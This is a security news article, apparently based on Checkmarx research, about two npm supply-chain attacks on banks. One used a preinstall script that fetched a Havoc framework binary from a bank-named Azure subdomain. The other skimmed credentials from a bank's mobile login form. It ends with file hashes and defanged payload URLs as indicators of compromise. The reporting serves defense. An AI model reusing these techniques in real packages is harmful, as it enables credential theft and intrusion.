First-ever Open-Source Software Supply Chain Attacks Targeting Banking Sector
Recent reports indicate that the banking sector has become the focus of threat actors utilizing an emerging supply chain attack. Two distinct incidents have been identified, with each involving unique tactics and threat actors.
Organizations implement vulnerability scanning only during the Software Development Life Cycle (SDLC) development phase, which is inadequate for the current threats organizations face.
This was the first instance where two open-source software supply-chain attacks were explicitly identified.
First Incident in Banking Sector
The first incident in early April involved a couple of npm packages that were developed and uploaded by the threat actor. These packages include a preinstall script which gets executed during installation.
The contributor of this package was linked to a LinkedIn profile which was spoofed as the employee of the targeted bank.
Spoofed Linkedin Profile (Source: Checkmarx)
Once the malicious package gets executed, it initially collects information about the operating system which is used for decoding relevant encrypted files.
After decoding, the encrypted files are then used to download a second-stage malicious binary.
Furthermore, VirusTotal, a widely used malware scanning tool, did not detect the Linux-specific second-stage binary.
This adds advantage to the threat actor to remain undetected and succeed in infiltration.
VirusTotal not detecting the malware (Source: Checkmarx)
In addition to this, the threat actor was using a subdomain in Azure which was incorporated with the name of the targeted bank. This served as a great potential attacking surface as Azure’s domains are whitelisted by default.
Finally, the attacker used the Havoc Framework for the second stage of the attack. Havoc Framework was developed by @C5pider which is an advanced post-exploitation framework capable of management, coordination, and modification of attacks.
Summary of the attack (Source: Checkmarx)
Second Incident
The second attack was in February 2023 in which another bank was targeted by a different threat group completely irrelevant to the April attack.
However, this attack also involved a masterfully crafted NPM package that is designed in such a way that it lies inactive on the login page of the bank and doesn’t act unless triggered.
Further investigations revealed that the payload had a unique Element ID in the HTML of the login page and attached itself to a specific login form element which prevents it from getting detected and collecting login data.
Later, the element was traced back to a mobile login page of the bank which was the prime target of the threat actors.
Payload of the login form (Source: Checkmarx)
Summary of the attack (Source: Checkmarx)
Indicators of Compromise
4eb44e10dba583d06b060abe9f611499eee8eec8ca5b6d007ed9af40df87836d
d2ee7c0febc3e35690fa2840eb707e1c9f8a125fe515cc86a43ba485f5e716a7
f4a57a3b28c15376dbb8f6b4d68c8cb28e6ba9703027ac66cbb76ee0eb1cd0c9
4e54c430206cd0cc57702ddbf980102b77da1c2f8d6d345093819d24c875e91a
79c3d584ab186e29f0e20a67187ba132098d01c501515cfdef4265bbbd8cbcbf
hxxp[:]//*[:]azureedge[:]net/AnnyPhaedra.bin
hxxp[:]//*[:]azureedge[:]net/KellinaCordey.bin
hxxp[:]//*[:]azureedge[:]net/MidgeWileen.bin
It is recommended for organizations to look into their security measures and develop them to prevent this kind of supply-chain attack.
The post First-ever Open-Source Software Supply Chain Attacks Targeting Banking Sector appeared first on Cyber Security News.
Cyber Security News